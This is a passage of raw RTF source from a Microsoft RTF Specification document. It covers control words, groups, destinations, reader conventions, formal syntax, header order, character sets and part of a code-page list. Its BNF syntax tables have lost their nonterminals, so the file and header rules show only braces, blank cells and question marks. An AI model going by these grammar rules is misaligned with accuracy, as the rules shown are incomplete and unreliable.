\par {\listtext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}\pard\plain \fi-144\li144\sa120\widctlpar\jclisttab\tx360\ls22\adjustright \f1\fs20\cgrid {\b \\clNoWrap
\par {\listtext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}\\clwWidth}{\b\i N}{
\par {\listtext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}\pard \fi-144\li144\sa120\nowidctlpar\jclisttab\tx360\ls22\adjustright {\b \\tdfrmtxtBottom}{\b\i N}{\b
\par {\listtext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}\\tdfrmtxtLeft}{\b\i N
\par {\listtext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}{\b \\tdfrmtxtRight}{\b\i N}{\b
\par {\listtext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}\\tdfrmtxtTop}{\b\i N}{\b
\par {\listtext\pard\plain\s21 \f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}\pard\plain \s21\fi-144\li144\sa120\nowidctlpar\jclisttab\tx360\tx720\tqr\tldot\tx10080\ls22\adjustright \f1\fs20\cgrid {\b \\trftsWidthA}{\b\i N}{\b
\par {\listtext\pard\plain\s21 \f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}\\trftsWidthB}{\b\i N}{\b
\par {\listtext\pard\plain\s21 \f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}\\trftsWidth}{\b\i N}{\b
\par {\listtext\pard\plain\s21 \f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}\\trwWidthA}{\b\i N}{\b
\par {\listtext\pard\plain\s21 \f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}\\trwWidthB}{\b\i N}{\b
\par {\listtext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}\pard\plain \fi-144\li144\sa120\nowidctlpar\jclisttab\tx360\ls22\adjustright \f1\fs20\cgrid {\b \\trwWidth}{\b\i N}{\b
\par {\listtext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}\pard \fi-144\li144\ri-120\sa120\widctlpar\jclisttab\tx360\ls22\adjustright {\b \\sectspecifygenN
\par {\listtext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}\\ApplyBrkRules
\par }\pard \sa120\widctlpar\adjustright {The delimiter marks the end of an RTF control word, and can be one of the following:
\par }\pard \fi-360\li360\sa120\widctlpar\adjustright {\f3 \u-3913\'b7\tab }{A space. In this case, the space is part of the control word.
\par }{\f3 \u-3913\'b7\tab }{A digit or a hyphen (-), which indicates that a numeric parameter follows. The subsequent digital sequence is then delimited by a space or any character other than a letter or a digit. The p
arameter can be a positive or negative number. The range of the values for the number is generally \endash 32767 through 32767. However, Word tends to restrict the range to \endash 31680 through 31680. Word allows values in the range \endash
2,147,483,648 to 2,147,483,648 for a small number of keywords (specifically }{\b \\bin}{, }{\b \\revdttm}{
, and some picture properties). An RTF parser must handle an arbitrary string of digits as a legal value for a keyword. If a numeric parameter immediately follows the control word, this parameter becom
es part of the control word. The control word is then delimited by a space or a nonalphabetic or nonnumeric character in the same manner as any other control word.
\par }{\f3 \u-3913\'b7\tab }{Any character other than a letter or a digit. In this case, the delimiting character terminates the control word but is not actually part of the control word.
\par }\pard \sa120\widctlpar\adjustright {If a space delimits the control word, the space does not appear in the document. Any characters following the delimiter, including spaces, will appear in the document. For this reason, yo
u should use spaces only where necessary; do not use spaces merely to break up RTF code.
\par A }{\i control symbol}{ consists of a backslash followed by a single, nonalphabetic character. For example, }{\b \\~}{ represents a nonbreaking space. Control symbols take no delimiters.
\par A }{\i group}{ consists of text and control words or control symbols enclosed in braces (\{}{\expnd-4\expndtw-20 }{\}). The opening brace (\{}{\expnd-4\expndtw-20 }{) indicates the start of the group and the closing brace (}{\expnd-4\expndtw-20 }{\}
) indicates the end of the group. Each group specifies the text affected by the gr
oup and the different attributes of that text. The RTF file can also include groups for fonts, styles, screen color, pictures, footnotes, comments (annotations), headers and footers, summary information, fields, and bookmarks, as well as document-, sectio
n
-, paragraph-, and character-formatting properties. If the font, file, style, screen color, revision mark, and summary-information groups and document-formatting properties are included, they must precede the first plain-text character in the document. Th
ese groups form the RTF file header. If the group for fonts is included, it should precede the group for styles. If any group is not used, it can be omitted. The groups are discussed in the following sections.
\par The control properties of certain control words
(such as bold, italic, keep together, and so on) have only two states. When such a control word has no parameter or has a nonzero parameter, it is assumed that the control word turns on the property. When such a control word has a parameter of 0, it is a
ssumed that the control word turns off the property. For example, }{\b \\b}{ turns on bold, whereas }{\b \\b0}{ turns off bold.
\par Certain control words, referred to as }{\i destinations}{, mark the beginning of a collection of related text that could appear at another position, or
destination, within the document. Destinations may also be text that is used but should not appear within the document at all. An example of a destination is the \\
footnote group, where the footnote text follows the control word. Page breaks cannot occur in
destination text. Destination control words and their following text must be enclosed in braces. No other control words or text may appear within the destination group. Destinations added after the RTF Specification published in the March 1987 }{\i
Microsoft Systems Journal}{ may be preceded by the control symbol }{\b \\*}{
. This control symbol identifies destinations whose related text should be ignored if the RTF reader does not recognize the destination. (RTF writers should follow the convention of using this control
symbol when adding new destinations or groups.) Destinations whose related text should be inserted into the document even if the RTF reader does not recognize the destination should not use }{\b \\*}{
. All destinations that were not included in the March 1987 revision of the RTF Specification are shown with }{\b \\*}{ as part of the control word.
\par Formatting specified within a group affects only the text within that group. Generally, text within a group inherits the formatting of the text in the preceding group. However, Mi
crosoft implementations of RTF assume that the footnote, annotation, header, and footer groups (described later in this specification) do not inherit the formatting of the preceding text. Therefore, to ensure that these groups are always formatted correct
ly, you should set the formatting within these groups to the default with the }{\b \\sectd, \\pard, }{and }{\b \\plain }{control words, and then add any desired formatting.
\par The control words, control symbols, and braces constitute control information. All other characters in the file are plain text. Here is an example of plain text that does not exist within a group:
\par }\pard\plain \s70\li432\sa120\widctlpar\adjustright \f2\fs16\cgrid {\{\\rtf\\ansi\\deff0\{\\fonttbl\{\\f0\\froman Tms Rmn;\}\{\\f1\\fdecor
\par Symbol;\}\{\\f2\\fswiss Helv;\}\}\{\\colortbl;\\red0\\green0\\blue0;
\par \\red0\\green0\\blue255;\\red0\\green255\\blue255;\\red0\\green255\\
\par blue0;\\red255\\green0\\blue255;\\red255\\green0\\blue0;\\red255\\
\par green255\\blue0;\\red255\\green255\\blue255;\}\{\\stylesheet\{\\fs20 \\snext0Normal;\}\}\{\\info\{\\author John Doe\}
\par \{\\creatim\\yr1990\\mo7\\dy30\\hr10\\min48\}\{\\version1\}\{\\edmins0\}
\par \{\\nofpages1\}\{\\nofwords0\}\{\\nofchars0\}\{\\vern8351\}\}\\widoctrl\\ftnbj \\sectd\\linex0\\endnhere \\pard\\plain \\fs20 This is plain text.\\par\}
\par
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {The phrase \ldblquote This is plain text.\rdblquote is not part of a group and is treated as document text.
\par As previously mentioned, the backslash (\\) and braces (\{}{\expnd-4\expndtw-20 }{\}) have special meaning in RTF. To use these characters as text, precede them with a backslash, as in \\\\, \\\{, and \\\}.
\par }\pard\plain \s1\sb240\sa240\keepn\widctlpar\outlinelevel0\adjustright \b\caps\f1\fs32\cgrid {{\*\bkmkstart _Toc313960796}{\*\bkmkstart _Toc335399070}{\*\bkmkstart _Toc380819767}{\*\bkmkstart _Toc381591818}{\*\bkmkstart _Toc382644179}
{\*\bkmkstart _Toc383176010}{\*\bkmkstart _Toc386002168}{\*\bkmkstart _Toc386539799}{\*\bkmkstart CONVENTIONS_OF_AN_RTF_READER}{\*\bkmkstart _Toc519492434}{\*\bkmkstart _Toc521909677}Conventions of an RTF Reader{\*\bkmkend _Toc313960796}
{\*\bkmkend _Toc335399070}{\*\bkmkend _Toc380819767}{\*\bkmkend _Toc381591818}{\*\bkmkend _Toc382644179}{\*\bkmkend _Toc383176010}{\*\bkmkend _Toc386002168}{\*\bkmkend _Toc386539799}{\*\bkmkend CONVENTIONS_OF_AN_RTF_READER}{\*\bkmkend _Toc519492434}
{\*\bkmkend _Toc521909677}
\par }\pard\plain \sa120\keepn\widctlpar\adjustright \f1\fs20\cgrid {The reader of an RTF stream is concerned with the following:
\par }\pard \fi-360\li360\sa120\keepn\widctlpar\adjustright {\f3 \u-3913\'b7\tab }{Separating control information from plain text.
\par }{\f3 \u-3913\'b7\tab }{Acting on control information.
\par }\pard \fi-360\li360\sa120\widctlpar\adjustright {\f3 \u-3913\'b7\tab }{Collecting and properly inserting text into the document, as directed by the current group state.
\par }\pard \sa120\widctlpar\adjustright {Acting on control information is designed to be a relatively simple process. Some control information simply contributes special characters to the plain text stream. Other information serves to change the }{\i
program state}{, which includes properties of the document as a whole, or to change any of a collection of }{\i group states}{, which apply to parts of the document.
\par As previously mentioned, a group state can specify the following:
\par }\pard \fi-360\li360\sa120\widctlpar\adjustright {\f3 \u-3913\'b7\tab }{The }{\i destination}{, or part of the document that the plain text is constructing.
\par }{\f3 \u-3913\'b7\tab }{Character-formatting properties, such as bold or italic.
\par }{\f3 \u-3913\'b7\tab }{Paragraph-formatting properties, such as justified or centered.
\par }{\f3 \u-3913\'b7\tab }{Section-formatting properties, such as the number of columns.
\par }{\f3 \u-3913\'b7\tab }{Table-formatting properties, which define the number of cells and dimensions of a table row.
\par }\pard \sa120\widctlpar\adjustright {In practice, an RTF reader will evaluate each character it reads in sequence as follows:
\par }\pard \fi-360\li360\sa120\widctlpar\adjustright {\f3 \u-3913\'b7\tab }{If the character is an opening brace (\{), the reader stores its current state on the stack. If the character is a closing brace (\}
), the reader retrieves the current state from the stack.
\par }{\f3 \u-3913\'b7\tab }{If the character is a backslash (\\), the reader collects the control word or control symbol and its parameter, if any, and
looks up the control word or control symbol in a table that maps control words to actions. It then carries out the action prescribed in the lookup table. (The possible actions are discussed in the following table.) The read pointer is left before or after
a control-word delimiter, as appropriate.
\par }{\f3 \u-3913\'b7\tab }{If the character is anything other than an opening brace (\{), closing brace (\}), or backslash (\\
), the reader assumes that the character is plain text and writes the character to the current destination using the current formatting properties.
\par }\pard \sa120\widctlpar\adjustright {If the RTF
reader cannot find a particular control word or control symbol in the lookup table described in the preceding list, the control word or control symbol should be ignored. If a control word or control symbol is preceded by an opening brace (\{
), it is part of a group. The current state should be saved on the stack, but no state change should occur. When a closing brace (\}) is encountered, the current state should be retrieved from the stack, thereby resetting the current state. If the }{\b \\
* }{control symbol precedes a control word, then it defines a destination group and was itself preceded by an opening brace (\{). The RTF reader should discard all text up to and including the closing brace (\}
) that closes this group. All RTF readers must recognize all destinations
defined in the March 1987 RTF Specification. The reader may skip past the group, but it is not allowed to simply discard the control word. Destinations defined since March 1987 are marked with the }{\b \\*}{ control symbol.
\par }\pard\plain \s65\li432\sa120\widctlpar\adjustright \i\f1\fs20\cgrid {\b Note}{ All RTF readers must implement the }{\b \\*}{ control symbol so that they can read RTF files written by newer RTF writers.
\par }\pard\plain \sa120\keepn\widctlpar\adjustright \f1\fs20\cgrid {For control words or control symbols that the RTF reader can find in the lookup table, the possible actions are as follows.
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx3330\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx10152\pard \sa120\keepn\widctlpar\intbl\adjustright {\b Action\cell Description\cell }\pard \widctlpar\intbl\adjustright
{\b \row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx3330\clvertalt\cltxlrtb \cellx10152\pard \sb120\sa120\widctlpar\intbl\adjustright {Change Destination\cell The RTF read
er changes the destination to the destination described in the table entry. Destination changes are legal only immediately after an opening brace (\{}{\expnd-4\expndtw-20 }{
). (Other restrictions may also apply; for example, footnotes cannot be nested.) Many destination changes imply that the current property settings will be reset to their default settings. Examples of control words that change destination are }{\b \\
footnote}{, }{\b \\header}{, }{\b \\footer}{, }{\b \\pict}{, }{\b \\info}{, }{\b \\fonttbl}{, }{\b \\stylesheet}{, and }{\b \\colortbl}{. This specification identifies all destination control words where they appear in control-word tables.\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {Change Formatting Property\cell The RTF reader changes the property as described in the table entry. The entry will specify whether a parameter is required. }
{\field\fldedit{\*\fldinst { HYPERLINK \\l "APPENDIX_B_INDEX_OF_RTF_CONTROL_WORDS" }{{\*\datafield
08d0c9ea79f9bace118c8200aa004ba90b02000000080000002600000041005000500045004e004400490058005f0042005f0049004e004400450058005f004f0046005f005200540046005f0043004f004e00540052004f004c005f0057004f00520044005300000000}}}{\fldrslt {\cs110\ul\cf2
Appendix B: Index of RTF Control Words}}}{ at the end of this Specification also specifies which control words require parameters. If a parameter is needed and not specified, then a default value will be used. The default value used depends o
n the control word. If the control word does not specify a default, then all RTF readers should assume a default of 0.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {Insert Special Character\cell
The reader inserts into the document the character code or codes described in the table entry.\cell }\pard \widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx3330\clvertalt\cltxlrtb \cellx10152\pard
\sa120\widctlpar\intbl\adjustright {Insert Special Character and Perform Action\cell }\pard\plain \s71\sa240\widctlpar\intbl\adjustright \f1\fs20\cgrid {
The reader inserts into the document the character code or codes described in the table entry and performs whatever other action the entry specifies. For example, when Microsoft Word interprets }{\b \\par}{, a paragraph mark is inserte
d in the document and special code is run to record the paragraph properties belonging to that paragraph mark.\cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\pard\plain \s1\sb240\sa240\keepn\widctlpar\outlinelevel0\adjustright
\b\caps\f1\fs32\cgrid {{\*\bkmkstart _Toc313960797}{\*\bkmkstart _Toc335399071}{\*\bkmkstart _Toc380819768}{\*\bkmkstart _Toc381591819}{\*\bkmkstart _Toc382644180}{\*\bkmkstart _Toc383176011}{\*\bkmkstart _Toc386002169}{\*\bkmkstart _Toc386539800}
{\*\bkmkstart FORMAL_SYNTAX}{\*\bkmkstart _Toc519492435}{\*\bkmkstart _Toc521909678}Formal Syntax{\*\bkmkend _Toc313960797}{\*\bkmkend _Toc335399071}{\*\bkmkend _Toc380819768}{\*\bkmkend _Toc381591819}{\*\bkmkend _Toc382644180}{\*\bkmkend _Toc383176011}
{\*\bkmkend _Toc386002169}{\*\bkmkend _Toc386539800}{\*\bkmkend FORMAL_SYNTAX}{\*\bkmkend _Toc519492435}{\*\bkmkend _Toc521909678}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {RTF uses the following syntax, based on Backus-Naur Form.
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\b Syntax\cell Meaning\cell }\pard \widctlpar\intbl\adjustright {\b \row }\trowd \trleft432\trkeep \clvertalt\clbrdrt
\brdrs\brdrw15 \cltxlrtb \cellx2160\clvertalt\clbrdrt\brdrs\brdrw15 \cltxlrtb \cellx10080\pard \sb120\sa120\widctlpar\intbl\adjustright {#PCDATA\cell Text (without control words).\cell }\pard \widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep
\clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\lang3082 #SDATA\cell Hexadecimal data.\cell }\pard \widctlpar\intbl\adjustright {\lang3082 \row }\pard\plain \s21\sa120\widctlpar\intbl\adjustright
\f1\fs20\cgrid {#BDATA\cell }\pard\plain \sa120\widctlpar\intbl\adjustright \f1\fs20\cgrid {Binary data.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {'c'\cell A literal.\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\cell A nonterminal.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b A}{\cell
The (terminal) control word a, without a parameter. \cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b\i a }{or }{\b a}{\b\i N}{\cell The (terminal) control word a, with a parameter.\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {A?\cell Item a is optional.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {A+\cell One or more repetitions of item a.\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {A*\cell Zero or more repetitions of item a.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {A b\cell Item a followed by item b.\cell
}\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {A | b\cell Item a or item b.\cell }\pard \widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard
\sa120\widctlpar\intbl\adjustright {a & b\cell }\pard\plain \s71\sa240\widctlpar\intbl\adjustright \f1\fs20\cgrid {Item a and/or item b, in any order.\cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\pard\plain
\s1\sb240\sa240\keepn\widctlpar\outlinelevel0\adjustright \b\caps\f1\fs32\cgrid {{\*\bkmkstart _Toc313960798}{\*\bkmkstart _Toc335399072}{\*\bkmkstart _Toc380819769}{\*\bkmkstart _Toc381591820}{\*\bkmkstart _Toc382644181}{\*\bkmkstart _Toc383176012}
{\*\bkmkstart _Toc386002170}{\*\bkmkstart _Toc386539801}{\*\bkmkstart CONTENTS_OF_AN_RTF_FILE}{\*\bkmkstart _Toc519492436}{\*\bkmkstart _Toc521909679}Contents of an RTF File{\*\bkmkend _Toc313960798}{\*\bkmkend _Toc335399072}{\*\bkmkend _Toc380819769}
{\*\bkmkend _Toc381591820}{\*\bkmkend _Toc382644181}{\*\bkmkend _Toc383176012}{\*\bkmkend _Toc386002170}{\*\bkmkend _Toc386539801}{\*\bkmkend CONTENTS_OF_AN_RTF_FILE}{\*\bkmkend _Toc519492436}{\*\bkmkend _Toc521909679}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {An RTF file has the following syntax:
\par }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\cell }{\lang1036 '\{' '\}'\cell }\pard \widctlpar\intbl\adjustright {\lang1036 \row }\pard
\sa120\widctlpar\adjustright {\lang1036
\par }{This syntax is the standard
RTF syntax; any RTF reader must be able to correctly interpret RTF written to this syntax. It is worth mentioning again that RTF readers do not have to use all control words, but they must be able to harmlessly ignore unknown (or unused) control words, a
nd they must correctly skip over destinations marked with the }{\b \\*}{
control symbol. There may, however, be RTF writers that generate RTF that does not conform to this syntax, and as such, RTF readers should be robust enough to handle some minor variations. Non
etheless, if an RTF writer generates RTF conforming to this specification, then any correct RTF reader should be able to interpret it.
\par }\pard\plain \s2\sb240\sa240\keepn\widctlpar\outlinelevel1\adjustright \b\f1\fs32\cgrid {{\*\bkmkstart _Toc313960799}{\*\bkmkstart _Toc335399073}{\*\bkmkstart _Toc380819770}{\*\bkmkstart _Toc381591821}{\*\bkmkstart _Toc382644182}
{\*\bkmkstart _Toc383176013}{\*\bkmkstart _Toc386002171}{\*\bkmkstart _Toc386539802}{\*\bkmkstart Header}{\*\bkmkstart _Toc519492437}{\*\bkmkstart _Toc521909680}Header{\*\bkmkend _Toc313960799}{\*\bkmkend _Toc335399073}{\*\bkmkend _Toc380819770}
{\*\bkmkend _Toc381591821}{\*\bkmkend _Toc382644182}{\*\bkmkend _Toc383176013}{\*\bkmkend _Toc386002171}{\*\bkmkend _Toc386539802}{\*\bkmkend Header}{\*\bkmkend _Toc519492437}{\*\bkmkend _Toc521909680}
\par }\pard\plain \sa120\keepn\widctlpar\adjustright \f1\fs20\cgrid {The header has the following syntax:
\par }\pard \sa120\widctlpar\intbl\adjustright {\cell }{\b\i \\rtf}{ }{\b\i \\deff}{? ? ? ? ? ? ? ?\cell }\pard \widctlpar\intbl\adjustright {\row
}\pard \sa120\widctlpar\adjustright {{\*\bkmkstart _Ref281719559}{\*\bkmkstart _Toc313960800}{\*\bkmkstart _Toc335399074}
\par Each of the various header tables should appear, if they exist, in this order. Document properties can occur before and between the header tables. A property must be defined before being referenced. Specifically,
\par {\pntext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}\pard \fi-360\li720\sa120\widctlpar\tx720{\*\pn \pnlvlblt\ilvl0\ls2\pnrnot0\pnf3\pnstart1\pnindent360\pnhang{\pntxtb \'b7}}\ls2\adjustright {
The style sheet must occur before any style usage.
\par {\pntext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}\pard \fi-360\li720\sa120\widctlpar\tx720{\*\pn \pnlvlblt\ilvl0\ls2\pnrnot0\pnf3\pnstart1\pnindent360\pnhang{\pntxtb \'b7}}\ls2\adjustright {
The font table must precede any reference to a font.
\par {\pntext\pard\plain\f3\fs20 \loch\af3\dbch\af0\hich\f3 \u-3913\'b7\tab}}\pard \fi-360\li720\sa120\widctlpar\tx720{\*\pn \pnlvlblt\ilvl0\ls2\pnrnot0\pnf3\pnstart1\pnindent360\pnhang{\pntxtb \'b7}}\ls2\adjustright {The }{\b \\deff}{
keyword must precede any text without an explicit reference to a font, because it specifies the font to use in such cases.
\par }\pard\plain \s3\sb240\sa240\keepn\widctlpar\outlinelevel2\adjustright \b\f1\fs28\cgrid {{\*\bkmkstart _Toc380819771}{\*\bkmkstart _Toc381591822}{\*\bkmkstart _Toc382644183}{\*\bkmkstart _Toc383176014}{\*\bkmkstart _Toc386002172}
{\*\bkmkstart _Toc386539803}{\*\bkmkstart RTF_Version}{\*\bkmkstart _Toc519492438}{\*\bkmkstart _Toc521909681}RTF Version{\*\bkmkend _Ref281719559}{\*\bkmkend _Toc313960800}{\*\bkmkend _Toc335399074}{\*\bkmkend _Toc380819771}{\*\bkmkend _Toc381591822}
{\*\bkmkend _Toc382644183}{\*\bkmkend _Toc383176014}{\*\bkmkend _Toc386002172}{\*\bkmkend _Toc386539803}{\*\bkmkend RTF_Version}{\*\bkmkend _Toc519492438}{\*\bkmkend _Toc521909681}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {An entire RTF file is considered a group and must be enclosed in braces. The }{\b \\rtf}{\b\i N}{ control word must follow the opening brace. The numeric parameter }{\b\i N}{
identifies the major version of the RTF Specification used. The RTF standard described in this specification, although titled as version 1.7, continues to correspond syntactically to RTF Specification version 1. Therefore, the numeric parameter }{\b\i N}
{ for the }{\b \\rtf}{ control word should still be emitted as 1.
\par }\pard\plain \s3\sb240\sa240\keepn\widctlpar\outlinelevel2\adjustright \b\f1\fs28\cgrid {{\*\bkmkstart _Toc313960801}{\*\bkmkstart _Toc335399075}{\*\bkmkstart _Toc380819772}{\*\bkmkstart _Toc381591823}{\*\bkmkstart _Toc382644184}
{\*\bkmkstart _Toc383176015}{\*\bkmkstart _Toc386002173}{\*\bkmkstart _Toc386539804}{\*\bkmkstart Character_Set}{\*\bkmkstart _Toc519492439}{\*\bkmkstart _Toc521909682}Character Set{\*\bkmkend _Toc313960801}{\*\bkmkend _Toc335399075}
{\*\bkmkend _Toc380819772}{\*\bkmkend _Toc381591823}{\*\bkmkend _Toc382644184}{\*\bkmkend _Toc383176015}{\*\bkmkend _Toc386002173}{\*\bkmkend _Toc386539804}{\*\bkmkend Character_Set}{\*\bkmkend _Toc519492439}{\*\bkmkend _Toc521909682}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {After specifying the RTF versio
n, you must declare the character set used in this document. The control word for the character set must precede any plain text or any table control words. The RTF Specification currently supports the following character sets.
\par
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx2160\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\b Control word\cell Character set\cell }\pard
\widctlpar\intbl\adjustright {\b \row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sb120\sa120\widctlpar\intbl\adjustright {\b \\ansi\cell }{ANSI (the default)\cell }\pard \widctlpar\intbl\adjustright {
\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\mac\cell }{Apple Macintosh\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\pc\cell }{IBM PC code page 437\cell }\pard \widctlpar\intbl\adjustright {\row
}\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\b \\pca\cell }{IBM PC code page 850, used by IBM Personal System/2 (not implemented in version 1 of Microsoft Word for OS/2)
\cell }\pard \widctlpar\intbl\adjustright {\f5 \row }\pard\plain \s3\sb240\sa240\keepn\widctlpar\outlinelevel2\adjustright \b\f1\fs28\cgrid {{\*\bkmkstart _Toc379295355}{\*\bkmkstart _Toc380819773}{\*\bkmkstart _Toc381591824}{\*\bkmkstart _Toc382644185}
{\*\bkmkstart _Toc383176016}{\*\bkmkstart _Toc386002174}{\*\bkmkstart _Toc386539805}{\*\bkmkstart Unicode_RTF}{\*\bkmkstart _Toc519492440}{\*\bkmkstart _Toc521909683}{\*\bkmkstart _Ref281718258}{\*\bkmkstart _Ref281718288}{\*\bkmkstart _Ref281718720}
{\*\bkmkstart _Toc313960802}{\*\bkmkstart _Toc335399076}Unicode RTF{\*\bkmkend _Toc379295355}{\*\bkmkend _Toc380819773}{\*\bkmkend _Toc381591824}{\*\bkmkend _Toc382644185}{\*\bkmkend _Toc383176016}{\*\bkmkend _Toc386002174}{\*\bkmkend _Toc386539805}
{\*\bkmkend Unicode_RTF}{\*\bkmkend _Toc519492440}{\*\bkmkend _Toc521909683}
\par }\pard\plain \s15\li288\sa120\widctlpar\adjustright \f1\fs20\cgrid {Word 2002 is a Unicode-enabled application. Text is ha
ndled using the 16-bit Unicode character encoding scheme. Expressing this text in RTF requires a new mechanism, because until this release (version 1.6), RTF has only handled 7-bit characters directly and 8-bit characters encoded as hexadecimal. The Unico
de mechanism described here can be applied to any RTF destination or body text.
\par
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx2112\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx10032\pard\plain \s98\sb240\sl199\slmult1\keepn\widctlpar\intbl\brdrbtw\brdrs\brdrw15 \adjustright \b\f1\fs20\cgrid {
Control word\cell Meaning\cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2112\clvertalt\cltxlrtb \cellx10032\pard\plain \s68\sb60\sa60\widctlpar\intbl\adjustright \b\f1\fs20\cgrid {
\\ansicpg}{\i N}{\cell }\pard\plain \sb120\sa120\widctlpar\intbl\adjustright \f1\fs20\cgrid {This keyword represents the ANSI code page used to perform the Unicode to ANSI conversion when writing RTF text. }{\b\i N}{ represents the code page in d
ecimal. This is typically set to the default ANSI code page of the run-time environment (for example, }{\b \\ansicpg1252}{
for U.S. Windows). The reader can use the same ANSI code page to convert ANSI text back to Unicode. Possible values include the following:
\par }\pard \sa120\nowidctlpar\intbl\adjustright {\cs113\cf1\revised\revdttm1714774824 437\tab United States IBM
\par 708\tab Arabic (ASMO 708)
\par 709\tab Arabic (ASMO 449+, BCON V4)
\par 710\tab Arabic (transparent Arabic)
\par 711\tab Arabic (Nafitha Enhanced)
\par 720\tab Arabic (transparent ASMO)
\par 819\tab Windows 3.1 (United States and Western Europe)
\par 850\tab IBM multilingual
\par 852\tab Eastern European
\par 860\tab Portuguese
\par 862\tab Hebrew
\par 863\tab French Canadian
\par 864\tab Arabic
\par 865\tab Norwegian
\par 866\tab Soviet Union
\par }{\cs113\cf1\revised\revdttm1714774825 874}{\cs113\cf1\revised\revdttm1714774826 \tab }{\cs113\cf1\revised\revdttm1714774825 Thai
\par }{\cs113\cf1\revised\revdttm1714774824 932\tab Japanese
\par }{\cs113\cf1\revised\revdttm1714774825 936}{\cs113\cf1\revised\revdttm1714774826 \tab }{\cs113\cf1\revised\revdttm1714774825 Simplified Chinese
\par 949}{\cs113\cf1\revised\revdttm1714774826 \tab }{\cs113\cf1\revised\revdttm1714774825 Korean
\par 950}{\cs113\cf1\revised\revdttm1714774826 \tab }{\cs113\cf1\revised\revdttm1714774825 Traditional Chinese
\par }{\cs113\cf1\revised\revdttm1714774824 1250}{\cs113\cf1\revised\revdttm1714774826 \tab }{\cs113\cf1\revised\revdttm1714774824 Windows 3.1 (Eastern European)
\par 1251\tab Windows 3.1 (Cyrillic)
\par 1252}{\cs113\cf1\revised\revdttm1714774827 \tab }{\cs113\cf1\revised\revdttm1714774824 Western European
\par 1253}{\cs113\cf1\revised\revdttm1714774828 \tab }{\cs113\cf1\revised\revdttm1714774824 Greek
\par 1254}{\cs113\cf1\revised\revdttm1714774828 \tab }{\cs113\cf1\revised\revdttm1714774824 Turkish
